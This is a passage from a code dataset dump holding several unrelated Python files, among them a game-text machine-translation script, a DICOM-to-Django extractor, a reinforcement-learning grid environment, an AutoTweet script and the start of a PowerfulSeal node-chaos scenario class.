2)}s\")\n sleep(sleep_time)\n return new_data\n\n\ndef translate_text_files():\n # Check if already exists\n if file_exists(\"translated_text.json\"):\n print(\"Skipping translated_text.json, already done.\")\n return\n\n with open(\"dumped_text.json\", \"r\", encoding=\"cp932\") as f:\n data = json.load(f)\n\n new_data = machine_translate_list(data)\n\n with open(\"translated_text.json\", \"w\", encoding=\"cp932\") as f:\n json.dump(new_data, f, indent=4)\n\n\ndef translate_helptext_file():\n # Check if already exists\n if file_exists(\"translated_helptext.json\"):\n print(\"Skipping translated_helptext.json, already done.\")\n return\n\n with open(\"dumped_helptext.json\", \"r\", encoding=\"cp932\") as f:\n data = json.load(f)\n\n new_data = machine_translate_single(\"HelpText.bin\", data)\n\n with open(\"translated_helptext.json\", \"w\", encoding=\"cp932\") as f:\n json.dump(new_data, f, indent=4)\n\n\ndef translate_tutorial_file():\n # Check if already exists\n if file_exists(\"translated_tutorial.json\"):\n print(\"Skipping translated_tutorial.json, already done.\")\n return\n\n with open(\"dumped_tutorial.json\", \"r\", encoding=\"cp932\") as f:\n data = json.load(f)\n\n new_data = machine_translate_single(\"Tutorial.bin\", data)\n\n with open(\"translated_tutorial.json\", \"w\", encoding=\"cp932\") as f:\n json.dump(new_data, f, indent=4)\n\n\ndef translate_scripts():\n for root, _, files in os.walk(\"scripts\"):\n for name in files:\n fp = os.path.join(root, name)\n config = ConfigParser()\n modified = False\n with open(fp, \"r\", encoding=\"cp932\") as f:\n config.read_file(f)\n if int(config[\"data\"][\"translated\"]) == 0:\n for i, string in 
enumerate(config[\"strings\"]):\n s = config[\"strings\"][string]\n if s:\n t = random.uniform(3, 7)\n translated = translate_text(s)\n config[\"strings\"][string] = translated\n print(f\"File: {name}, Old: {repr(s)}, New: {repr(translated)}, Done {i}/{len(config['strings'])}, Sleeping for {round(t, 2)}s\")\n sleep(t)\n config[\"data\"][\"translated\"] = \"1\"\n modified = True\n if modified:\n with open(fp, \"w\", encoding=\"cp932\") as f:\n config.write(f)\n\n\nif __name__ == \"__main__\":\n # Machine translate dumped text/ files\n translate_text_files()\n\n # Machine translate dumped help/HelpText.bin file\n translate_helptext_file()\n\n # Machine translate dumped tutorial/Tutorial.bin file\n translate_tutorial_file()\n\n # Machine translate scripts\n translate_scripts()\n","sub_path":"machine_translate.py","file_name":"machine_translate.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"571932285","text":"import unittest\nimport geosoft.gxapi as gxapi\nimport numpy as np\nimport geosoft.gxpy.view as gxv\nimport geosoft.gxpy.group as gxg\nimport geosoft.gxpy.vv as gxvv\n\nfrom base import GXAPITest\n\n\nclass Test(GXAPITest):\n\n @classmethod\n def setUpClass(cls):\n cls.setUpGXAPITest()\n\n # @unittest.skip('WIP – see issue #13 https://github.com/GeosoftInc/gxapi/issues/13')\n def test_draw_surface_3d(self):\n\n verts = np.array([[0, 0, 0],\n [5, 0, 0],\n [5, 5, 0],\n [0, 3, 5],\n [2.5, 2, 10],\n [-3, 6, 8],\n [-4, 0, 12]], dtype=np.float64)\n faces = np.array([[0, 1, 2],\n [0, 2, 3],\n [3, 2, 4],\n [1, 2, 4],\n [3, 4, 5],\n [6, 4, 5]], dtype=np.int32)\n\n with gxv.View_3d.new() as v3d:\n v3d_file = v3d.file_name\n with gxg.Draw_3d(v3d, 'Surface') as g:\n verts = verts[faces].reshape(-1, 3)\n vx, vy, vz = gxvv.vvset_from_np(verts)\n vf1, vf2, vf3 = gxvv.vvset_from_np(faces)\n normals = gxg.vertex_normals_np(faces, verts)\n nx, ny, nz = gxvv.vvset_from_np(normals[faces].reshape(-1, 3))\n\n # using a constant color does not complain\n v3d.gxview.draw_surface_3d_ex('test',\n vx.gxvv, vy.gxvv, vz.gxvv,\n nx.gxvv, ny.gxvv, nz.gxvv,\n gxapi.GXVV.null(), gxg.C_GREY,\n vf1.gxvv, vf2.gxvv, vf3.gxvv,\n v3d.coordinate_system.gxipj)\n\n # using an array color raises invalid number of colour if we pass colours/vertex\n color = np.array([gxg.C_GREY for i in range(vx.length)])\n color_vv = gxvv.GXvv(color, dtype=np.int32)\n try:\n v3d.gxview.draw_surface_3d_ex('test2',\n vx.gxvv, vy.gxvv, vz.gxvv,\n nx.gxvv, ny.gxvv, nz.gxvv,\n color_vv.gxvv, gxg.C_GREY,\n vf1.gxvv, vf2.gxvv, vf3.gxvv,\n v3d.coordinate_system.gxipj)\n\n except gxapi.GXAPIError as e:\n print(str(e))\n\n # and if pass colours/face it asserts\n color = np.array([gxg.C_GREY for i in range(faces.shape[0])])\n color_vv = gxvv.GXvv(color, dtype=np.int32)\n v3d.gxview.draw_surface_3d_ex('test2',\n vx.gxvv, vy.gxvv, vz.gxvv,\n nx.gxvv, ny.gxvv, nz.gxvv,\n color_vv.gxvv, gxg.C_GREY,\n vf1.gxvv, vf2.gxvv, vf3.gxvv,\n v3d.coordinate_system.gxipj)\n\n\n###############################################################################################\n\nif __name__ == '__main__':\n\n unittest.main()\n","sub_path":"tests/python/test_mview.py","file_name":"test_mview.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"225427889","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport codecs\nimport csv\nfrom datetime import datetime\nimport 
re\nimport django\n\nfrom django.db import models\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(\"/neuro/users/yves.verpillieux/DicomInfoExtraction/prg/dmd2b_web\")\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"dmd2b_web.settings\"\ndjango.setup()\n\nfrom polls.models import PatientDetails, StudyDetails, SeriesDetails, AdditionalHeaderInfo\n\npydicomdir = os.path.join(os.getcwd(), \"pydicom-master\")\n\n##dicomfiles = os.path.join(\"C:\\Boston Children Hospital\\DicomInfoExtraction\\image\", \"sample\")\n\nos.chdir(r\"/net/tautona/neuro/labs/grantlab/users/yves.verpillieux/DicomInfoExtraction/prg/dicom\")\n\nprint (os.getcwd())\n\n#outputDir = os.path.join(r\"/net/tautona/neuro/labs/grantlab/users/yves.verpillieux/DicomInfoExtraction\", \"output\")\n\n#dicomDirTopLevel = os.path.join(os.getcwd(), \"SammyTestData\")\n\nsys.path.append(pydicomdir)\n\n\nfrom pydicom import dicomio\n\n\ndef retrieveDicomFiles():\n \"\"\"retireves all DICOM files stored in folders.\n \"\"\"\n lstFilesDCM = []\n for dirname, dirnames, filenames in os.walk('.', topdown=True, followlinks=True):\n for filename in filenames:\n\n if \".dcm\" in filename.lower():\n\n lstFilesDCM.append(os.path.join(dirname,filename))\n return lstFilesDCM\n\n\n\ndef extractDicomData(inputImageFileList):\n \"\"\"Reads and extracts Patient's Basic Info from a DICOM file.\n \"\"\"\n data = {} # dictionary of patients\n\n for i, dfile in enumerate(inputImageFileList):\n pydicomFileData = dicomio.read_file(dfile)\n\n############################## Patient Details #################################\n\n patientDetails = {}\n patientID = str(pydicomFileData.PatientID)\n if patientID in data:\n ''\n else:\n patientDetails[\"PatientID\"]=pydicomFileData.PatientID\n patientDetails[\"PatientName\"]= str.replace(str(pydicomFileData.PatientName),'^',' ')\n patientDetails[\"PatientSex\"]=pydicomFileData.PatientSex\n if pydicomFileData[0x00101010]:\n patientDetails[\"PatientReportedAge\"]=pydicomFileData.PatientAge\n else:\n patientDetails[\"PatientReportedAge\"]=''\n\n dob = datetime.strptime(pydicomFileData.PatientBirthDate , '%Y%m%d')\n sod = datetime.strptime(pydicomFileData.StudyDate, '%Y%m%d')\n patientDetails[\"PatientBirthDate\"]= dob\n\n patientDetails['Age_Days']= str.replace(str(sod-dob),'days, 0:00:00','')\n\n data[patientID] = {}\n data[patientID][\"patientInfo\"] = patientDetails\n data[patientID][\"studies\"] = {}\n\n############################## Study Details ###################################\n\n studyDetails = {}\n studyID=''\n if pydicomFileData[0x00200010]:\n studyID = str(pydicomFileData.StudyID)\n if studyID in data[patientID][\"studies\"]:\n ''\n else:\n studyDetails[\"StudyID\"]= pydicomFileData.StudyID\n studyDetails[\"StudyDescription\"]=pydicomFileData.StudyDescription\n studyDetails[\"StudyDate\"]= datetime.strptime(pydicomFileData.StudyDate, '%Y%m%d')\n #studyDetails[\"PatientID\"]=pydicomFileData.PatientID\n\n data[patientID][\"studies\"][studyID] = {}\n data[patientID][\"studies\"][studyID][\"studyInfo\"] = studyDetails\n data[patientID][\"studies\"][studyID][\"series\"] = {}\n\n############################## Series Details ##################################\n\n seriesDetails = {}\n seriesID = str(pydicomFileData.SeriesInstanceUID)\n if seriesID in data[patientID][\"studies\"][studyID][\"series\"]:\n ''\n else:\n seriesDetails[\"SeriesID\"]=pydicomFileData.SeriesInstanceUID\n seriesDetails[\"SeriesDescription\"]=pydicomFileData.SeriesDescription\n if 
pydicomFileData[0x00080060]:\n seriesDetails[\"Modality\"]=pydicomFileData.Modality\n else:\n seriesDetails[\"Modality\"]=''\n\n #if pydicomFileData[0x00200010]:\n # seriesDetails[\"StudyID\"]=pydicomFileData.StudyID\n #else:\n # seriesDetails[\"StudyID\"]=''\n\n #seriesDetails[\"PatientID\"]=pydicomFileData.PatientID\n\n data[patientID][\"studies\"][studyID][\"series\"][seriesID] = {}\n data[patientID][\"studies\"][studyID][\"series\"][seriesID][\"seriesInfo\"] = seriesDetails\n\n\n################################################################################\n #import pdb; pdb.set_trace()\n return data\n\n\n'''\ndef extractAdditionalHeaderInfo():\n lstFilesDCM = []\n headerInfoList =[]\n for dirname, dirnames, filenames in os.walk('.', topdown=True, followlinks=True):\n\n for filename in filenames:\n\n if \"0.info\" in filename.lower():\n\n lstFilesDCM.append(os.path.join(dirname,filename))\n\n tracker = set()\n\n for i, dfile in enumerate(lstFilesDCM):\n\n x = open(dfile,'r').readlines()\n inforDict ={\n\n y =x[3:]\n\n for xx in y:\n if \"PatientID\" in xx:\n inforDict[\"PatientID\"]=''.join(xx[12:])\n\n\n if \"Primary Slice Direction\" in xx:\n # print(xx[24:])\n inforDict[\"PrimarySliceDirection\"]=''.join(xx[24:])\n\n if \"ProtocolName\" in xx:\n\n inforDict[\"ProtocolName\"]=''.join(xx[14:])\n # print(xx)\n\n if \"voxel sizes\" in xx:\n\n inforDict[\"VoxelSizes\"]=''.join(xx[15:])\n # print(xx)\n\n if \"fov\" in xx:\n inforDict[\"fov\"]=''.join(xx[15:])\n\n if \"dimensions\" in xx:\n\n inforDict[\"dimensions\"]=''.join(xx[15:])\n\n if \"SeriesInstanceUID\" in xx:\n # print(xx[19:])\n\n inforDict[\"SeriesID\"]=''.join(xx[19:])\n\n\n # print(d)\n headerInfoList.append(inforDict)\n\n\n return headerInfoList\n'''\n\n\n\ndef saveTodb(data):\n \"\"\"Save in a django database created by the models\n \"\"\"\n inputfile = data #we have a list of dictionary\n print(data)\n\n for p in data:\n\n\n\n############### Saving Patient Details in a django database ####################\n\n pa = PatientDetails()\n pa.PatientID = p['PatientID']\n pa.PatientSex = p['PatientSex']\n pa.PatientBirthDate = p['PatientBirthDate']\n pa.Age_Days = p['Age_Days']\n pa.PatientName = p['PatientName']\n pa.PatientReportedAge = p['PatientReportedAge']\n\n #pa.save()\n\n################ Saving Study Details in a django database #####################\n\n sa = StudyDetails()\n sa.PatientID = p['PatientID']\n sa.StudyID = p['StudyID']\n sa.StudyDate = p['StudyDate']\n sa.StudyDescription = p['StudyDescription']\n\n sa.patient = pa\n\n #sa.save()\n\n################ Saving Series Details in a django database ####################\n\n se = SeriesDetails()\n se.PatientID = p['PatientID']\n se.SeriesID = p['SeriesID']\n se.SeriesDescription = p['SeriesDescription']\n se.Modality = p['Modality']\n se.StudyID = p['StudyID']\n\n se.patient = pa\n se.study = sa\n\n #se.save()\n\n############## Saving Additional Header Info in a django database ##############\n '''\n hi = AdditionalHeaderInfo()\n hi.PatientID = p['PatientID']\n try:\n hi.SeriesID = p['SeriesID']\n hi.fov = p['fov']\n hi.dimensions = p['dimensions']\n hi.VoxelSizes = p['VoxelSizes']\n hi.PrimarySliceDirection = p['PrimarySliceDirection']\n hi.ProtocolName = p['ProtocolName']\n except KeyError:\n pass\n\n hi.patient = pa\n hi.series = se\n hi.save()\n '''\n\n\nif __name__ == \"__main__\":\n\n saveTodb(extractDicomData(retrieveDicomFiles()))\n #saveTodb(extractAdditionalHeaderInfo())\n\n 
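# retrieveDicomFiles() walks the tree, extractDicomData() parses the DICOM headers, saveTodb() builds Django model rows (note the model .save() calls above are commented out)\n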
print('Done!')\n","sub_path":"services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"238371452","text":"import variable\nfrom functions import utils\n\n\ndef test_message(update, context):\n message = update.message\n\n if message.chat.type == \"private\":\n return\n\n from_user = message['from_user']\n utils.send_in_private_or_in_group(\"Ciao!\", message.chat.id, from_user)\n\n\ndef do_stress_test(update):\n message = update.message\n from_user = message.from_user\n\n i = 0\n n = 100000000\n while i <= n:\n if i == n:\n variable.updater.bot.send_message(from_user.id, \"Completate \" + str(n) + \" iterazioni!\")\n i += 1\n\n\ndef stress_test(update, context):\n return # this function is disabled.\n # do_stress_test(update)\n","sub_path":"features/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"279206554","text":"import numpy as np\nfrom AnalyticGeometryFunctions import computeVectorNorm, computeAngleBetweenVectors\nimport pygame as pg\nimport os\n\n# init variables\nactionSpace = [[0, 1], [1, 0], [-1, 0], [0, -1], [1, 1], [-1, -1], [1, -1], [-1, 1]]\nxBoundary = [0, 180]\nyBoundary = [0, 180]\nvel = 1\n\n\nclass OptimalPolicy:\n def __init__(self, actionSpace):\n self.actionSpace = actionSpace\n\n def __call__(self, state):\n targetState = state[2:4]\n agentState = state[0:2]\n relativeVector = np.array(targetState) - np.array(agentState)\n angleBetweenVectors = {computeAngleBetweenVectors(relativeVector, action): action for action in\n np.array(self.actionSpace)}\n action = angleBetweenVectors[min(angleBetweenVectors.keys())]\n return action\n\n\ndef checkBound(state, xBoundary, yBoundary):\n xMin, xMax = xBoundary\n yMin, yMax = yBoundary\n xPos, yPos = state\n if xPos >= xMax or xPos <= xMin:\n return False\n elif yPos >= yMax or yPos <= yMin:\n return False\n return True\n\n\ndef getEachState(state):\n return state[:2], state[2:]\n\n\nclass TransitionFunction():\n def __init__(self, xBoundary, yBoundary, velocity):\n self.xBoundary = xBoundary\n self.yBoundary = yBoundary\n self.velocity = velocity\n\n def __call__(self, state, action):\n agentState, targetPosition = getEachState(state)\n actionMagnitude = computeVectorNorm(np.array(action))\n modifiedAction = np.array(action) * self.velocity / actionMagnitude\n newAgentState = np.array(agentState) + modifiedAction\n if checkBound(newAgentState, self.xBoundary, self.yBoundary):\n return np.concatenate([newAgentState, targetPosition])\n return np.concatenate([agentState, targetPosition])\n\n\nclass IsTerminal():\n def __init__(self, minDistance):\n self.minDistance = minDistance\n return\n\n def __call__(self, state):\n agentState, targetPosition = getEachState(state)\n relativeVector = np.array(agentState) - np.array(targetPosition)\n relativeDistance = computeVectorNorm(relativeVector)\n if relativeDistance <= self.minDistance:\n return True\n return False\n\n\nclass Reset():\n def __init__(self, xBoundary, yBoundary):\n self.xBoundary = xBoundary\n self.yBoundary = yBoundary\n\n def __call__(self):\n xMin, xMax = self.xBoundary\n yMin, yMax = self.yBoundary\n initialAgentState = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n targetPosition = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n while not 
(checkBound(initialAgentState, self.xBoundary, self.yBoundary) and checkBound(targetPosition,\n self.xBoundary,\n self.yBoundary)):\n initialAgentState = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n targetPosition = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n return np.concatenate([initialAgentState, targetPosition])\n\n\nclass FixedReset():\n def __init__(self, xBoundary, yBoundary):\n self.xBoundary = xBoundary\n self.yBoundary = yBoundary\n\n def __call__(self):\n xMin, xMax = self.xBoundary\n yMin, yMax = self.yBoundary\n initialAgentState = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n targetPosition = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n initialDistance = computeVectorNorm(targetPosition - initialAgentState)\n while not (checkBound(initialAgentState, self.xBoundary, self.yBoundary) and checkBound(targetPosition,\n self.xBoundary,\n self.yBoundary) and initialDistance >= 20):\n initialAgentState = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n targetPosition = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n initialDistance = computeVectorNorm(targetPosition - initialAgentState)\n return np.concatenate([initialAgentState, targetPosition])\n\n\nclass Render():\n def __init__(self, numAgent, numOneAgentState, positionIndex, screen, screenColor, circleColorList, circleSize,\n saveImage, saveImagePath):\n self.numAgent = numAgent\n self.numOneAgentState = numOneAgentState\n self.positionIndex = positionIndex\n self.screen = screen\n self.screenColor = screenColor\n self.circleColorList = circleColorList\n self.circleSize = circleSize\n self.saveImage = saveImage\n self.saveImagePath = saveImagePath\n\n def __call__(self, state):\n for j in range(1):\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n self.screen.fill(self.screenColor)\n for i in range(self.numAgent):\n oneAgentState = state[self.numOneAgentState * i: self.numOneAgentState * (i + 1)]\n oneAgentPosition = oneAgentState[min(self.positionIndex): max(self.positionIndex) + 1]\n pg.draw.circle(self.screen, self.circleColorList[i],\n [np.int(oneAgentPosition[0]), np.int(oneAgentPosition[1])], self.circleSize)\n pg.display.flip()\n if self.saveImage == True:\n filenameList = os.listdir(self.saveImagePath)\n pg.image.save(self.screen, self.saveImagePath + '/' + str(len(filenameList)) + '.png')\n pg.time.wait(1)\n","sub_path":"src/neuralNetwork/toSeparateFiles/continuousEnv.py","file_name":"continuousEnv.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"576672092","text":"# Copyright 2013-2015 ARM Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\n# pylint: disable=R0201\nfrom unittest import TestCase\n\nfrom nose.tools import raises, assert_equal # pylint: disable=E0611\n\nfrom wlauto.utils.android import 
check_output\nfrom wlauto.utils.misc import merge_dicts, TimeoutError\n\n\nclass TestCheckOutput(TestCase):\n\n def test_ok(self):\n check_output(\"python -c 'import time; time.sleep(0.1)'\", timeout=0.5, shell=True)\n\n @raises(TimeoutError)\n def test_bad(self):\n check_output(\"python -c 'import time; time.sleep(1)'\", timeout=0.5, shell=True)\n\n\nclass TestMerge(TestCase):\n\n def test_dict_merge(self):\n base = {'a': 1, 'b': {'x': 9, 'z': 10}}\n other = {'b': {'x': 7, 'y': 8}, 'c': [1, 2, 3]}\n result = merge_dicts(base, other)\n assert_equal(result['a'], 1)\n assert_equal(result['b']['x'], 7)\n assert_equal(result['b']['y'], 8)\n assert_equal(result['b']['z'], 10)\n assert_equal(result['c'], [1, 2, 3])\n\n def test_merge_dict_lists(self):\n base = {'a': [1, 3, 2]}\n other = {'a': [3, 4, 5]}\n result = merge_dicts(base, other)\n assert_equal(result['a'], [1, 3, 2, 3, 4, 5])\n result = merge_dicts(base, other, list_duplicates='first')\n assert_equal(result['a'], [1, 3, 2, 4, 5])\n result = merge_dicts(base, other, list_duplicates='last')\n assert_equal(result['a'], [1, 2, 3, 4, 5])\n\n @raises(ValueError)\n def test_type_mismatch(self):\n base = {'a': [1, 2, 3]}\n other = {'a': 'test'}\n merge_dicts(base, other, match_types=True)\n\n","sub_path":"wlauto/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"606434883","text":"#!/usr/bin/python2\n'''\nAuthor: Keyvan Hedayati <k1.hedayati93@gmail.com>\nLicense: GNU General Public License, version 2\nTODO: Improve code and OOP\n'''\nfrom argparse import ArgumentDefaultsHelpFormatter, ArgumentParser\nfrom logging import debug, basicConfig, info, error, critical, DEBUG\nfrom os.path import dirname, realpath, joinpath\nfrom re import compile, IGNORECASE, DOTALL\nfrom sqlite3 import connect, Error\nfrom time import sleep\nfrom urllib2 import urlopen, URLError\n\nfrom twitter import Twitter, OAuth, TwitterHTTPError\n\n\nclass AutoTweet():\n\n def __init__(self, *args):\n '''\n Tries to create or connect to database and store instance in\n class variable db, if failed log error and exit.\n '''\n try:\n db_path = joinpath(dirname(realpath(__file__)), 'data.db')\n self.db = connect(db_path)\n self.twitter = self.get_twitter_object()\n self.tweet(*args)\n except Error as e:\n critical('Could not Connect to Database, ', e.args[0])\n exit(1)\n\n def get_twitter_object(self):\n '''\n Tries to get an instance of twitter object from oauth table data\n and return created Twitter instance, if faild log error and exit.\n '''\n try:\n cursor = self.db.cursor()\n result = cursor.execute('SELECT * FROM oauth').fetchone()\n auth = OAuth(result[0], result[1], result[2], result[3])\n return Twitter(auth=auth)\n except Error as e:\n critical('Could not Get OAuth Data, %s', e.args[0])\n exit(1)\n except TypeError as e:\n critical('First insert OAuth secrets in database, %s',\n e.args[0])\n exit(1)\n\n def prepare_tweet(self, tweet_is_url, add_auto_tweet):\n '''\n Get a tweet from database then if tweet_is_url was true then\n gets title of URL and appends it tweet also if there is no\n internet connection waits until connection established, finally\n returns tweet string with #AutoTweet hash tag if add_auto_tweet\n was true, also catches some exception and handles then, such as\n database and URL errors\n '''\n try:\n cursor = self.db.cursor()\n id, tweet = cursor.execute('SELECT id, tweet FROM tweets WHERE \\\n sent = 0 
LIMIT 1').fetchone()\n self.id = id\n if tweet_is_url:\n if not (tweet.startswith('http://') or\n tweet.startswith('https://')):\n tweet = 'http://' + tweet\n self.wait_for_connection()\n page = urlopen(tweet).read()\n regex = compile('<title>(.*?)',\n IGNORECASE | DOTALL)\n\n title = regex.search(str(page)).group(1)\n tweet = title + ' ' + tweet\n return tweet + (' #AutoTweet' if add_auto_tweet else '')\n except URLError as e:\n critical('Could not Open URL, %s', e.args[0])\n exit(1)\n except TypeError as e:\n critical('First Insert Some Tweets into Database, %s',\n e.args[0])\n exit(1)\n except Error as e:\n critical('Database Problem, Could not Get Tweet, %s',\n e.args[0])\n exit(1)\n\n def mark_as_sent(self):\n '''\n After successfully tweeted a tweet updates its record to show\n that we are done with this tweet\n '''\n try:\n cursor = self.db.cursor()\n cursor.execute('UPDATE tweets SET sent = 1 WHERE id = ?',\n (self.id,))\n self.db.commit()\n except Error as e:\n critical('Could not Mark As Sent, %s', e.args[0])\n\n def wait_for_connection(self, wait=60, retry=100):\n '''\n Waits untill conection establishes and can open twitter.com\n without error.\n '''\n for i in range(retry):\n try:\n response = urlopen('http://twitter.com', timeout=10)\n return\n except URLError:\n sleep(wait)\n\n def tweet(self, tweet_is_url, add_auto_tweet):\n '''\n Main method, tweets on twitter with waiting for internet connection,\n marking it as sent, logging and catching exceptions.\n '''\n try:\n tweet = self.prepare_tweet(tweet_is_url, add_auto_tweet).strip()\n info('Tweeting: %s', tweet)\n self.wait_for_connection()\n self.twitter.statuses.update(status=tweet)\n info('Tweeted Successfully')\n self.mark_as_sent()\n except URLError as e:\n critical('Connection refused, %s', e.args[0])\n exit(1)\n except TwitterHTTPError as e:\n critical('Authentication Problem, Check OAuth Values')\n exit(1)\n\n\nclass Install():\n def __init__(self, first_time=False):\n '''\n Connects to database, if first_time was true then installs database\n '''\n self.db = connect('data.db')\n if first_time:\n self.install_database()\n self.get_oauth()\n self.insert_tweets()\n\n def remove_table_data(self, tables):\n ''' Removes specified table from database. '''\n try:\n cursor = self.db.cursor()\n for table in tables:\n cursor.execute('DELETE FROM ' + table)\n self.db.commit()\n except Error as e:\n critical('Could not Delete%sData, %s', (' '.join(tables),\n e.args[0]))\n exit(1)\n\n def install_database(self):\n ''' Create database tables '''\n try:\n cursor = self.db.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS tweets \\\n (id INTEGER PRIMARY KEY, tweet TEXT UNIQUE,\\\n sent INTEGER)')\n cursor.execute('CREATE TABLE IF NOT EXISTS oauth \\\n (access_token TEXT, access_token_secret TEXT, \\\n consumer_key TEXT, consumer_secret TEXT)')\n self.db.commit()\n critical('Database Created Successfully')\n except Error as e:\n self.db.rollback()\n critical('Database error occurred, %s', e.args[0])\n exit(1)\n\n def get_oauth(self):\n ''' Gets oauth data from user and stores them in database. 
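Prompts for the consumer key/secret and access token/secret, clears the oauth table, then inserts the new row.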
'''\n try:\n consumer_key = raw_input('Enter Consumer Key: ')\n consumer_secret = raw_input('Enter Consumer Secret: ')\n access_token = raw_input('Enter Access Token: ')\n access_token_secret = raw_input('Enter Access Token Secret: ')\n\n cursor = self.db.cursor()\n self.remove_table_data(['oauth'])\n cursor.execute('INSERT INTO oauth VALUES (?, ?, ?, ?)',\n (access_token, access_token_secret, consumer_key,\n consumer_secret))\n self.db.commit()\n info('OAuth Data Inserted Successfully')\n except Error as e:\n self.db.rollback()\n critical('Could not insert oauth data, %s', e.args[0])\n exit(1)\n\n def insert_tweets(self):\n '''\n Gets tweets filename and inserts them into database, also removes\n trailing newline.\n '''\n try:\n cursor = self.db.cursor()\n filename = raw_input('Enter Tweets Filename: ')\n tweets = open(filename)\n for tweet in tweets:\n if tweet[-1:] == '\\n':\n tweet = tweet[:-1]\n cursor.execute('INSERT INTO tweets(tweet, sent) VALUES (?, ?)',\n (tweet, 0))\n tweets.close()\n self.db.commit()\n info('Tweets Inserted Successfully')\n except IOError as e:\n critical('File not Found')\n exit(1)\n except Error as e:\n self.db.rollback()\n critical('Could not insert Tweets, %s', e.args[0])\n exit(1)\n\n\ndef main():\n '''\n Parses args, configs logging and call right function depending on given\n arguments\n '''\n args = parse_args()\n log_file = joinpath(dirname(realpath(__file__)), 'log')\n basicConfig(filename=log_file, level=DEBUG)\n if args.remove:\n Install().remove_table_data(args.remove)\n if args.install:\n if 'all' in args.install:\n Install(first_time=True)\n else:\n if 'db' in args.install:\n Install().install_database()\n if 'auth' in args.install:\n Install().get_oauth()\n if 'tweet' in args.install:\n Install().insert_tweets()\n exit(0)\n for i in range(args.num):\n AutoTweet(args.url, args.add_auto_tweet)\n exit(0)\n\n\ndef parse_args():\n ''' Parses arguments '''\n description = 'Automatically tweets from list'\n formatter_class = ArgumentDefaultsHelpFormatter\n parser = ArgumentParser(description=description,\n formatter_class=formatter_class)\n parser.add_argument('-i',\n '--install',\n choices=('all', 'db', 'auth', 'tweet'),\n help='Install database(db), oauth data(auth)\\\n and tweets to be tweeted(tweet)',\n nargs='*')\n parser.add_argument('-r',\n '--remove',\n choices=('oauth', 'tweets'),\n help='Removes inserted data from database',\n nargs='*')\n parser.add_argument('-n',\n '--num',\n default=1,\n help='Number of tweets to be tweeted at once',\n type=int)\n parser.add_argument('-u',\n '--url',\n action='store_true',\n default=True,\n help='When tweet is a URL this option will try\\\n to get title of URL and append it to tweet'\n )\n parser.add_argument('-a',\n '--no-auto-tweet',\n action='store_false',\n dest='add_auto_tweet',\n help='Whether to add #AutoTweet hash tag or not')\n return parser.parse_args()\n\nif __name__ == '__main__':\n main()\n","sub_path":"AutoTweet.py","file_name":"AutoTweet.py","file_ext":"py","file_size_in_byte":10592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"598326613","text":"\n# Copyright 2017 Bloomberg Finance L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is 
distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom powerfulseal.metriccollectors.collector import NODE_SOURCE\nfrom .scenario import Scenario\n\n\nclass NodeScenario(Scenario):\n \"\"\" NodeScenarios scenario handler.\n\n Adds metching for nodes and node-specific actions\n \"\"\"\n\n def __init__(self, name, schema, inventory, driver,\n executor, logger=None, metric_collector=None):\n Scenario.__init__(self, name, schema, logger=logger, metric_collector=metric_collector)\n self.inventory = inventory\n self.driver = driver\n self.executor = executor\n\n def match(self):\n \"\"\" Makes a union of all the nodes matching any of the policy criteria.\n \"\"\"\n selected_nodes = set()\n criteria = self.schema.get(\"match\", [])\n for node in self.inventory.find_nodes():\n for criterion in criteria:\n match = criterion.get(\"property\")\n if self.match_property(node, match):\n self.logger.info(\"Matching %r\", node)\n selected_nodes.add(node)\n if len(selected_nodes) == 0:\n self.metric_collector.add_matched_to_empty_set_metric(NODE_SOURCE)\n return list(selected_nodes)\n\n def action_start(self, item, params):\n \"\"\" Action to start a node.\n \"\"\"\n self.logger.info(\"Action start on %r\", item)\n try:\n self.driver.start(item)\n except:\n self.logger.exception(\"Error starting the machine\")\n\n def action_stop(self, item, params):\n \"\"\" Action to stop a node.\n \"\"\"\n self.logger.info(\"Action stop on %r\", item)\n try:\n 